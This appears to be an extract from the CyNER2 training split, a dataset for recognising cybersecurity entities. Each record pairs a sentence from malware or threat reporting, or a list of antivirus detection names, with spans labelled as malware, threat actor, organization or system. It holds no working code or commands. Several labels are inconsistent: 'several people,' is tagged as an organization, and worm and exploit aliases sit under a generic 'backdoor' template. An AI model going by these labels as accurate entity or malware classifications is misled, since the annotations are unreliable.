{"text": "A backdoor also known as: Win32.Worm.P2P.Tibick.D W32/Tibick.d Worm.P2P.Tibick!vdEsmQVVXQU W32/Tibick.C@p2p W32.Tibick W32/Tibick.C Win32/Tibick.E WORM_TIBICK.F P2P-Worm.Win32.Tibick.d Win32.Worm.P2P.Tibick.D Worm.Win32.Tibick.36222 Worm.Win32.Tibick.D Win32.Worm.P2P.Tibick.D Win32.HLLW.Tibic Worm/Tibick.d WORM_TIBICK.F P2P-Worm.Win32.Tibick.D!IK Worm/P2P.Tibick.c Worm:Win32/Tibick.D Win32.Worm.P2P.Tibick.D W32/Tibick.C@p2p Win32/Tibick.worm.36248 Win32/Tibick.D Worm.P2p.Tibick.f P2P-Worm.Win32.Tibick.D W32/Tibick.C!worm.p2p Worm/Tibick.E W32/Tibick.B.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001907", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnlineGameWRAL.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9976 W32/Trojan.PUJS-2392 Win32/Cropo.A Win.Trojan.Small-7581 Trojan.KillProc.1539 W32/Trojan.BXFW Trj/SmallProxy.AB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001908", "source": "cyner2_train"}}
{"text": "This email was then forwarded to several people, with the malicious Excel file attached.", "spans": {"ORGANIZATION: several people,": [[33, 48]], "MALWARE: malicious": [[58, 67]]}, "info": {"id": "cyner2_train_001909", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.CB0B Backdoor.RCServ Backdoor.RCServ.Win32.44 Backdoor.W32.Rcserv!c Backdoor/RCServ.c Backdoor.RCServ Win.Trojan.RCServ-1 Backdoor.RCServ Backdoor.Win32.RCServ.c Trojan.Win32.RCServ.dmhw Backdoor.Win32.A.RCServ.404480[UPX] BackDoor.RC BehavesLike.Win32.Downloader.cc Backdoor:Win32/RCServ.C Backdoor.Win32.RCServ.c Bck/RCServ.L Win32.Backdoor.Rcserv.Lohl Backdoor.RCServ!QJAExtCJ+QQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001912", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.PDF.AC Exp.SWF.CVE-2012-0754 Exploit.PDF.AC Trojan.Pidief SWF/Exploit.CVE-2011-0611.C TROJ_PIDIEF.SMBD Exploit.JS.Pdfka.dqw Exploit.PDF.AC PDF.Z.CVE-2011-0611.411562.A[h] Exploit.SWF.CVE-2011-0611.t Exploit.PDF.AC Exploit.PDF.AC Exploit.PDF.2177 HEUR_SWFEXP.W Exploit.CVE-2011-0611.g EXP/CVE-2011-0611.F Trojan[Exploit]/SWF.CVE-2011-0611.s Exploit:SWF/CVE-2011-0611.I Exploit.JS.Pdfka.dqw!c Exploit.JS.Pdfka.dqw Exploit.PDF.AC Exploit.PDF.AC Exploit.CVE2011-0611 Exploit.JS.Pdfka SWF/CVE20110611.fam!exploit Exploit_c.UAO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001913", "source": "cyner2_train"}}
{"text": "Dyre is configured to defraud the customers of more than 1,000 banks and other companies worldwide.", "spans": {"MALWARE: Dyre": [[0, 4]], "ORGANIZATION: customers": [[34, 43]], "ORGANIZATION: banks": [[63, 68]], "ORGANIZATION: companies": [[79, 88]]}, "info": {"id": "cyner2_train_001916", "source": "cyner2_train"}}
{"text": "We previously outlined a spam campaign that delivered FAKEGLOBE and CERBER ransomwares.", "spans": {"THREAT_ACTOR: spam campaign": [[25, 38]], "MALWARE: FAKEGLOBE": [[54, 63]], "MALWARE: CERBER ransomwares.": [[68, 87]]}, "info": {"id": "cyner2_train_001919", "source": "cyner2_train"}}
{"text": "It is likely the vulnerability will be documented in full detail over the coming days.", "spans": {"VULNERABILITY: vulnerability": [[17, 30]]}, "info": {"id": "cyner2_train_001921", "source": "cyner2_train"}}
{"text": "Back in February, the ThreatConnect team conducted an in-depth independent analysis of the Anthem breach, finding connections to amorphous Chinese APT activity.", "spans": {"ORGANIZATION: ThreatConnect team": [[22, 40]], "THREAT_ACTOR: amorphous Chinese APT activity.": [[129, 160]]}, "info": {"id": "cyner2_train_001923", "source": "cyner2_train"}}
{"text": "Haima exactly does that, and more.", "spans": {"MALWARE: Haima": [[0, 5]]}, "info": {"id": "cyner2_train_001924", "source": "cyner2_train"}}
{"text": "This study on an active campaign delves into the structure, goals, and requirements of the organizations involved, and provides an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures.", "spans": {"THREAT_ACTOR: an active campaign": [[14, 32]], "ORGANIZATION: organizations": [[91, 104]]}, "info": {"id": "cyner2_train_001926", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O TrojanDownloader.Tearsp.AA2 Trojan/Downloader.Small.ahu Win32/Startpage.MF TROJ_SMALL_00000cc.TOMA Win.Trojan.Startpage-37 Trojan-Notifier.Win32.Small.a Trojan.Win32.Small.vkiie Trojan.Win32.A.Downloader.56724 TrojWare.Win32.TrojanDownloader.Small.AHU Trojan.MulDrop2.15120 Downloader.Small.Win32.40751 BehavesLike.Win32.Downloader.qt TrojanDownloader.Small.mmb W32.Trojan.Downloader.Small TR/StartPage.sc Trojan[Downloader]/Win32.Small Trojan:Win32/Symesta.B Downloader/Win32.Small.R5459 Trojan.Win32.Small.102210 Trj/Downloader.ABR Win32/TrojanDownloader.Small.AHU W32/Small.AHU!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001929", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Bandok.61952 Backdoor.Trojan Win32/Banbot.A Trojan.Bandook Backdoor.Win32.Bandok.h Backdoor.Win32.Bandok!IK Backdoor.Win32.Bandok.H Trojan.DownLoader.4293 Backdoor/Bandok.d Backdoor:Win32/Bandok.E Win-Trojan/Bandok.61952 Win32/Bandok.H Backdoor.Win32.Bandok.h Backdoor.Win32.Bandok W32/Bandok.H!tr.bdr BackDoor.Bandok.F Bck/Bandok.R", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001930", "source": "cyner2_train"}}
{"text": "VENOM features similar mechanisms to the tools used during the Freenode intrusion in 2014 external link.", "spans": {"MALWARE: VENOM": [[0, 5]], "MALWARE: tools": [[41, 46]], "THREAT_ACTOR: the Freenode intrusion": [[59, 81]]}, "info": {"id": "cyner2_train_001931", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Trojan.WisdomEyes.16070401.9500.9932 Trojan.MulDrop.2729 BehavesLike.Win32.Worm.dc TrojanDropper.Delf.cge TrojanBanker.Banker Trojan-Downloader.Win32.Delf W32/Banker.AFJ!tr Win32/Trojan.6cc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001933", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SoaloaE.Trojan Trojan/W32.Buzus.239324 Trojan.VBCrypt.MF.75 Trojan/Injector.bggr Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.SUAD-6922 Trojan.Win32.Buzus.osiq Trojan.Win32.Buzus.ebkods Win32.Trojan.Buzus.Lneb Trojan.PWS.Panda.4624 Trojan.Buzus.Win32.120917 BehavesLike.Win32.PWSZbot.dc Trojan/Buzus.bopu TR/Dropper.VB.ssypj W32/Injector.BJHT!tr Trojan/Win32.Buzus Trojan.Ransom.28 Trojan.Win32.Buzus.osiq Dropper/Win32.Necurs.R110132 Trojan.Crypt.NKN Trojan.Buzus!+gYkRxVVqlQ Trojan.Win32.Scarsi Trojan.Buzus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001935", "source": "cyner2_train"}}
{"text": "These backdoors are described in this part of the article.", "spans": {"MALWARE: backdoors": [[6, 15]]}, "info": {"id": "cyner2_train_001937", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Regiskazi.a TROJ_SPNR.11AG15 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_SPNR.11AG15 Trojan.Win32.Regiskazi.dmdtgx Trojan.DownLoader12.16045 BehavesLike.Win32.Worm.hh Trojan.Heur2.JP.E61E47 Backdoor:Win32/Regiskazi.A Trojan/Win32.Downloader.C45921 Trj/CI.A Trojan.Regiskazi! Trojan.Win32.Regiskazi W32/Regiskazi.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001938", "source": "cyner2_train"}}
{"text": "Currently this banker only have targets in Poland.", "spans": {"THREAT_ACTOR: banker": [[15, 21]]}, "info": {"id": "cyner2_train_001940", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.CVE-2014-1761.C Exp.RTF.CVE-2012-0158.A Exploit-CVE2012-0158.n Win32.Exploit.CVE-2012-0158.i Trojan.ZHPA-6 Trojan.Mdropper TROJ_ARTIEF.UK Exploit.CVE-2014-1761.C Exploit.Win32.CVE-2012-0158.j Exploit.CVE-2014-1761.C Exploit.Rtf.Heuristic-rtf.dinbqn Exploit.S.CVE-2012-1761.619765 Exploit.MSWord.CVE-2014-1761.k!c Exploit.CVE-2014-1761.C Exploit.CVE-2014-1761.7 Exploit.CVE.MacroWord.257 TROJ_ARTIEF.UK Exploit-CVE2012-0158.n Exploit.CVE-2012-0158.c EXP/CVE-2014-1761.C.619765 Trojan[Exploit]/Office.CVE-2012-0158 Exploit.CVE-2014-1761.C Exploit.CVE-2014-1761.C Word.Exploit.Cve-2014-1761.Dwsn Trojan.Exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001941", "source": "cyner2_train"}}
{"text": "Unit 42 for the past three months has been tracking a banking Trojan targeting victims in Brazil and the United States.", "spans": {"THREAT_ACTOR: Unit 42": [[0, 7]], "MALWARE: banking Trojan": [[54, 68]]}, "info": {"id": "cyner2_train_001943", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TsagaaSAJ.Trojan Worm.AutoRun.FLD Trojan/AutoRun.VB.bfc Trojan.Heur.E08AD6 Win32.Worm.AutoRun.bz W32.SillyFDC Worm.Win32.AutoRun.HMT Win32.HLLW.Autoruner2.18557 Worm.Win32.AutoRun TR/Razy.xdwer HackTool:Win32/Virledi.A Trojan/Win32.Zbot.C401270 W32/VB.BFC!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001944", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.CpqEasyBttn.Worm Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB!O Worm.Flewon.S349523 Win32.Worm.VB.ji Hacktool.Spammer Win32/Flewon.E WORM_VB.DHQ Win.Worm.Liamo-1 Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB.cb Dropped:Win32.Worm.VB.NRV Trojan.Win32.VB.hpnv W32.W.AutoRun.l6mI Win32.Worm-email.Vb.Wqda Dropped:Win32.Worm.VB.NRV Dropped:Win32.Worm.VB.NRV Trojan.PWS.Asterie Worm.VB.Win32.303 WORM_VB.DHQ BehavesLike.Win32.VBObfus.ch TrojanClicker.Qihai.aq TR/Spy.Vwealer.KZ.33 Worm[Email]/Win32.VB Win32.Worm.VB.NRV I-Worm.Win32.VB.94208.E Email-Worm.Win32.VB.cb Worm:Win32/Flewon.A HEUR/Fakon.mwf Dropped:Win32.Worm.VB.NRV Trojan.VBRA.010583 Win32/VB.NGN I-Worm.VB.XYH Email-Worm.Win32.VB.cb W32/VB.CB@mm W32/MadCoffee.B.worm Win32/Trojan.Spy.bc3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001950", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware08 Backdoor.Lecna.Q5 Trojan.SelfDelete Win32.Worm.ShipUp.h W32/Trojan-Gypikon-based.DM2!Ma Trojan.Win32.CFI.ddcdum TrojWare.Win32.ShipUp.AR Trojan.KillFiles.16512 BehavesLike.Win32.MultiPlug.dz W32/Trojan-Gypikon-based.DM2!Ma BDS/Taranis.4032 Backdoor:Win32/Lecna.Q!dha W32.W.AutoRun.m652 Trojan/Win32.Cossta.R120893 Win32/ShipUp.B Worm.Win32.ShipUp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001954", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Soul.ag Trojan.Heur.EEED6D Win32.Trojan.WisdomEyes.16070401.9500.9993 Win.Trojan.Crypted-3 Trojan.Win32.Pincav.bqfmw Trojan.Win32.Invader.blqtgb Win32.Trojan.Pincav.Dygr Trojan.Xispy Trojan.Xispy Trojan.Small.gr TR/Xispy.E.8 Troj.W32.Pincav.bqfmw!c Trojan.Win32.Pincav.bqfmw Trojan/Win32.IRCBot.C221390 Trojan.Soul!ykk6w7k8W/s Trj/Soul.I Win32/Trojan.Spy.620", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001955", "source": "cyner2_train"}}
{"text": "It is by no means a new threat, but it is still actively used and developed and worthy of a breakdown in an effort to defend against it.", "spans": {}, "info": {"id": "cyner2_train_001956", "source": "cyner2_train"}}
{"text": "In this article we will describe the process of extracting the final payload out of it's cover.", "spans": {}, "info": {"id": "cyner2_train_001957", "source": "cyner2_train"}}
{"text": "Since March 2016, the group has appeared to mostly focus on organizations in Hong Kong, sending malicious emails to targets as recently as August 4, and attempting to spread within compromised networks in order to steal information.", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: organizations": [[60, 73]], "SYSTEM: compromised networks": [[181, 201]]}, "info": {"id": "cyner2_train_001958", "source": "cyner2_train"}}
{"text": "Linux Trojan is designed to set up a SOCKS5 proxy server on the infected computer on the basis of the freeware source codes of the Satanic Socks Server.", "spans": {"SYSTEM: Linux": [[0, 5]], "MALWARE: Trojan": [[6, 12]], "SYSTEM: SOCKS5 proxy server": [[37, 56]], "SYSTEM: infected computer": [[64, 81]], "SYSTEM: the Satanic Socks Server.": [[127, 152]]}, "info": {"id": "cyner2_train_001959", "source": "cyner2_train"}}
{"text": "Since HackingTeam implants are built on-demand for each target, we wanted to take a closer look: to see how it works and what its functionality reveals about the possible interest of the attackers behind this latest Backdoor.", "spans": {}, "info": {"id": "cyner2_train_001961", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUA.Remadmin.S141625 Win32.Trojan.WisdomEyes.16070401.9500.9757 not-a-virus:RemoteAdmin.Win32.RMS.pr Trojan.Win32.RemoteAdmin.ekeqcb Trojan.MulDrop7.11923 BehavesLike.Win32.BadFile.th Trojan.Win32.RA W32/Trojan.BHMN-7604 W32.Rms.Pr TR/AD.RATBackdoor.fustx RiskWare[RemoteAdmin]/Win32.RMS.nd not-a-virus:RemoteAdmin.Win32.RMS.pr Backdoor.RMS Win32/RA-based.NFV Riskware.RemoteAdmin.DJ Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001962", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MiadheardLTS.Trojan Rootkit.Mask.A Trojan.Seedna Backdoor.Weevil.B BKDR_CARETO.A Rootkit.Mask.A Trojan.Win32.SGH.ay Rootkit.Mask.A Trojan.Win32.Heap.ctohpz Troj.W32.SGH.ay!c Win32.Trojan.Sgh.Pbpi Rootkit.Mask.A Backdoor:W32/Mask.A Trojan.SGH.Win32.2 BKDR_CARETO.A Backdoor.Mask W32/Backdoor.TAHG-4259 Trojan.Win32.c W32.Trojan.Careto TR/Heap.A.3 Trojan/Win32.SGH Rootkit.Mask.A Trojan.Win32.SGH.ay Trojan:WinNT/Seedna.A Trojan/Win32.Careto.R97384 Backdoor.Mask Trj/CI.A Win32/Appetite.C Trojan.SGH! Win32/Trojan.fa7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001963", "source": "cyner2_train"}}
{"text": "A backdoor also known as: I-Worm.Naked.A Worm/W32.Naked.73728 Email-Worm.Win32!O W32.Naked I-Worm.Naked.A Worm.Naked.Win32.1 I-Worm.Naked.A W32/Nakedwife.A@mm W32.Naked@mm WORM_NAKED.A Win.Worm.Naked-1 I-Worm.Naked.A Email-Worm.Win32.Naked I-Worm.Naked.A Trojan.Win32.Naked.hbai I-Worm.Win32.Naked I-Worm.Naked.A Win32.HLLW.Naked WORM_NAKED.A Worm.Win32.Naked W32/Nakedwife.A@mm Worm:Win32/Naked.B@mm Email-Worm.Win32.Naked Worm.Naked Win32.Worm-email.Naked.Pdmp I-Worm.Naked.A Win32/Trojan.fc6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001964", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Flystudio.100458 Win32.Trojan.FlyStudio.oj Win.Worm.Bingd-1 Trojan.Win32.Vilsel.dfmi Trojan.Win32.Winlock.c Worm.Win32.Dropper.RA BackDoor.Pigeon.64233 Packed.Vemply.aph TR/Ransom.MBRLock.usvpx Trojan.Win32.Vilsel.dfmi Backdoor.Hupigon Win32.Outbreak W32/MBRlock.AQ!tr Trojan.Win32.Made.J", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001969", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: TrojanDropper.Linux.Elknot.Y Backdoor.Linux.Mayday!c Linux/Elknot.A Backdoor.Linux.Mayday.g Trojan.Unix.DDoS.dncljq Linux.DDoS.7 Downloader.OpenConnection.JS.96932 ELF/Trojan.CNXM-8 Backdoor/Linux.hx LINUX/Elknot.iyani Linux/Mayday.1128800.E Backdoor.Linux.Mayday.g backdoor.linux.mayday.g Backdoor.Linux.Mayday", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001970", "source": "cyner2_train"}}
{"text": "The group extensively uses long-running strategic web compromises SWCs, and relies on whitelists to deliver payloads to select victims.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "MALWARE: payloads": [[108, 116]]}, "info": {"id": "cyner2_train_001971", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Trojan.Zapchas.F IRC/Flood.ev IRC.Zapchast.AQ REG/Zapchast.A W32/Zapchast.CS IRC.Zapchast Backdoor.IRC.Zapchast Dropped:Trojan.Zapchas.F Application.Win32.RiskWare.mIRC.~BAAA Trojan.Zapchas.F IRC.Flood SPR/mIRC-1790464.A.5 REG_ZAPCHAST.BV Riskware.Client-IRC.Win32.mIRC!IK Trojan.IRC.ah Backdoor/IRC.IRC Dropped:Trojan.Zapchas.F REG/Zapchast.A Backdoor.IRC.Zapchast.a IRC/Cloner.AT not-a-virus:Client-IRC.Win32.mIRC REG/Zapchast.4D53!tr.bdr IRC/BackDoor.Flood Bck/MIRCBased.BI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001977", "source": "cyner2_train"}}
{"text": "Throughout an attack campaign, actors will continue to develop their tools in an attempt to remain undetected and to carry out multiple attacks without having to completely retool.", "spans": {"THREAT_ACTOR: attack campaign, actors": [[14, 37]], "MALWARE: tools": [[69, 74]], "MALWARE: retool.": [[173, 180]]}, "info": {"id": "cyner2_train_001979", "source": "cyner2_train"}}
{"text": "With North Korea becoming increasingly isolated from the world economy the likelihood that it will use its cyber capabilities for financial gain grows.", "spans": {"ORGANIZATION: world economy": [[57, 70]]}, "info": {"id": "cyner2_train_001980", "source": "cyner2_train"}}
{"text": "This campaign seems to be old but still running although my infection wasn't being manually controlled at the time.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]]}, "info": {"id": "cyner2_train_001981", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Spam-Mailbot.m Trojan.Banker.Win32.7151 Backdoor.Trojan Win.Trojan.Banker-16870 Trojan.Packed.515 Trojan/Banker.xd Trojan.ZPACK!RjBLf3GsBZY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001983", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.a!bm3 Trojan/Downloader.Hacyayu.ahz Trojan.DL.Hacyayu!hNU/seEqyqU W32/Shiz.AK TROJ_SHIZ.SMP6 Trojan-Downloader.Win32.Hacyayu.alt Trojan.Packed.20771 TROJ_SHIZ.SMP6 Downloader.a!bm3 TrojanDownloader.Hacyayu.t Win32.TrojDownloader.Hacyayu.kcloud TrojanDownloader:Win32/Hacyayu.A Trojan.Win32.A.Downloader.39157 W32/Shiz.AK TrojanDownloader.Hacyayu.afi Trojan-Downloader.Win32.Hacyayu W32/Shiz.NCF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001984", "source": "cyner2_train"}}
{"text": "Recently, Antiy CERT has captured a batch of active hoze mining Trojan horse samples through the wind-catching honeypot system.", "spans": {"ORGANIZATION: Antiy CERT": [[10, 20]], "MALWARE: Trojan": [[64, 70]], "SYSTEM: the wind-catching honeypot system.": [[93, 127]]}, "info": {"id": "cyner2_train_001986", "source": "cyner2_train"}}
{"text": "The Trend Micro Forward Looking Threat Research team recently obtained samples of a new rootkit family from one of our trusted partners.", "spans": {"ORGANIZATION: Trend Micro": [[4, 15]], "MALWARE: rootkit family": [[88, 102]], "ORGANIZATION: trusted partners.": [[119, 136]]}, "info": {"id": "cyner2_train_001989", "source": "cyner2_train"}}
{"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ? id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently .", "spans": {"SYSTEM: Android": [[402, 409]], "ORGANIZATION: ASUS": [[542, 546]]}, "info": {"id": "cyner2_train_001990", "source": "cyner2_train"}}
{"text": "The primary samples examined appear in the wild with filenames mimicking that of Adobe s Content Management System and offers a range of commands typical of Remote Access Tools: file upload, file download, file execution, and command execution.", "spans": {"SYSTEM: Adobe s Content Management System": [[81, 114]]}, "info": {"id": "cyner2_train_001994", "source": "cyner2_train"}}
{"text": "On May 18, the authors of XData ransomware ran the massive attack against Ukrainian users supposedly leveraging the EternalBlue exploit as well as an ordinary spearphishing email delivery method.", "spans": {"THREAT_ACTOR: authors": [[15, 22]], "MALWARE: XData ransomware": [[26, 42]], "ORGANIZATION: Ukrainian users": [[74, 89]], "MALWARE: the EternalBlue exploit": [[112, 135]]}, "info": {"id": "cyner2_train_001998", "source": "cyner2_train"}}
{"text": "Dubsmash is a mobile app to create short selfie videos dubbed with famous sounds.", "spans": {"SYSTEM: Dubsmash": [[0, 8]], "SYSTEM: mobile app": [[14, 24]]}, "info": {"id": "cyner2_train_001999", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Win32.VBKrypt.1!O Trojan/Dropper.VB.nxw Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Pws.BCWZ Win.Spyware.47661-2 Trojan-Dropper.Win32.Dorifel.atjn Win32.Trojan-dropper.Dorifel.Akos TrojWare.Win32.VB.fmmu Trojan.DownLoader9.62284 BehavesLike.Win32.Trojan.gh Trojan-Dropper.Win32.Duon W32/PWS.IDDR-8868 Trojan.Heur.E019B0 Trojan-Dropper.Win32.Dorifel.atjn Malware-Dropper.VB.WLCrypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002000", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Script.SWF.Cxx+.C173 SWF.Kit.Angler.G Exploit-SWF.x Bloodhound.Flash.31 SWF/Exploit.CVE-2015-3090.A SWF_EKSPLOYT.ED Swf.Packer.Angle-1 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Exploit.SWF.438 SWF_EKSPLOYT.ED BehavesLike.Flash.Exploit.kb EXP/CVE-2015-3090.AU Exploit:SWF/Netis.B Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 SWF.Win32.Script.800529 Exploit.SWF SWF/ExKit.AQ!exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002004", "source": "cyner2_train"}}
{"text": "This article will discuss the malware delivered from that exploit kit.", "spans": {"MALWARE: malware": [[30, 37]], "MALWARE: exploit kit.": [[58, 70]]}, "info": {"id": "cyner2_train_002005", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.VBNA.bvts Trojan.Win32.VB.exmtrp Win32.Worm.Vbna.Wqdi Trojan.MSILPerseus.D2341B Worm.Win32.VBNA.bvts Worm:Win32/Esfury.T TScope.Trojan.MSIL Trj/CI.A Win32/Trojan.Dropper.6ac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002007", "source": "cyner2_train"}}
{"text": "An old banking Trojan has been operating in Europe on a low level has spiked in activity after migrating to Japan.", "spans": {"MALWARE: banking Trojan": [[7, 21]]}, "info": {"id": "cyner2_train_002008", "source": "cyner2_train"}}
{"text": "This article revolves around the macro tricks it uses to stall analysts, and new commands that it utilizes to better persist on infected devices.", "spans": {"MALWARE: macro": [[33, 38]], "SYSTEM: infected devices.": [[128, 145]]}, "info": {"id": "cyner2_train_002009", "source": "cyner2_train"}}
{"text": "Recently we were able to observe these actors making modifications to their ClaySlide delivery documents in an attempt to evade antivirus detection.", "spans": {}, "info": {"id": "cyner2_train_002010", "source": "cyner2_train"}}
{"text": "Within this blog post, a payload containing a function named forkmeiamfamous' was mentioned.", "spans": {"MALWARE: payload": [[25, 32]]}, "info": {"id": "cyner2_train_002013", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Lewor.B@mm Win32.Lewor.B@mm Worm.Lewor.Win32.28 W32/Lewor.b Win32.Lewor.E2C45E Win32.Trojan.WisdomEyes.16070401.9500.9944 W32.HLLW.Leox Win32.Lewor.B@mm Win32.Lewor.B@mm Trojan.Win32.Lewor.gptp W32.W.Lewor.b!c Win32.Lewor.B@mm Win32.Lewor.B@mm Trojan.PWS.Legmir BehavesLike.Win32.Pykse.kc I-Worm/Lewor.b Worm:Win32/Lewor.B@mm W32/Lewor.AP.worm Worm.Lewor!B42TpjAm9iw Trojan-Banker.Win32.Banker W32/GamePSW.B@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002014", "source": "cyner2_train"}}
{"text": "The exploit has since been added into the Angler Exploit Kit and integrated into Metasploit.", "spans": {"MALWARE: The exploit": [[0, 11]], "MALWARE: Angler Exploit Kit": [[42, 60]], "MALWARE: Metasploit.": [[81, 92]]}, "info": {"id": "cyner2_train_002016", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Kagayab Trojan.Razy.D18A59 Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike.Win32.Dropper.mm W32/Trojan.GGCJ-3154 TrojanDownloader:Win32/Kagayab.A Trj/GdSda.A Win32/Trojan.a98", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002017", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.12BD Trojanspy.Babar Trojan.Badbar Win32.Trojan.Babar.A Trojan-Spy.Win32.Babar.a Trojan.Win32.Babar.dqhfcx Troj.Spy.W32!c Trojan.Babar.1 Trojan.Babar.Win32.3 BehavesLike.Win32.Trojan.fc TrojanSpy.Babar.c TR/AD.Babar.royis Trojan.Zusy.D42EE8 PWS:Win32/Babar.A!dha Trj/GdSda.A Win32.Trojan-spy.Babar.Dwsy Win32/Trojan.Spy.8fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002018", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DaltetoD.Trojan Trojan/Fbphotofake.b Win32.Trojan.WisdomEyes.16070401.9500.9992 HV_CARDPAY_CA222928.TOMC Win.Trojan.Ag-4254306-1 Trojan-Dropper.Win32.FrauDrop.cth Trojan.Win32.Drop.mssht TrojWare.Win32.Downloader.Fraudload.AB Trojan.AVKill.14860 Dropper.FrauDrop.Win32.3001 BehavesLike.Win32.PWSZbot.fc Trojan.Win32.Fifesock W32.Malware.Downloader Trojan[Dropper]/Win32.FrauDrop Trojan-Dropper.Win32.FrauDrop.cth Trojan/Win32.CardPay.R21713 TrojanDropper.FrauDrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002019", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Ddosaz.elmrbx TrojWare.Win32.ServStart.DQ Trojan.DownLoader23.31518 BehavesLike.Win32.Backdoor.kh Trojan.Graftor.D53379 Trojan:Win32/Ddosaz.A BScope.TrojanDDoS.Macri Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002020", "source": "cyner2_train"}}
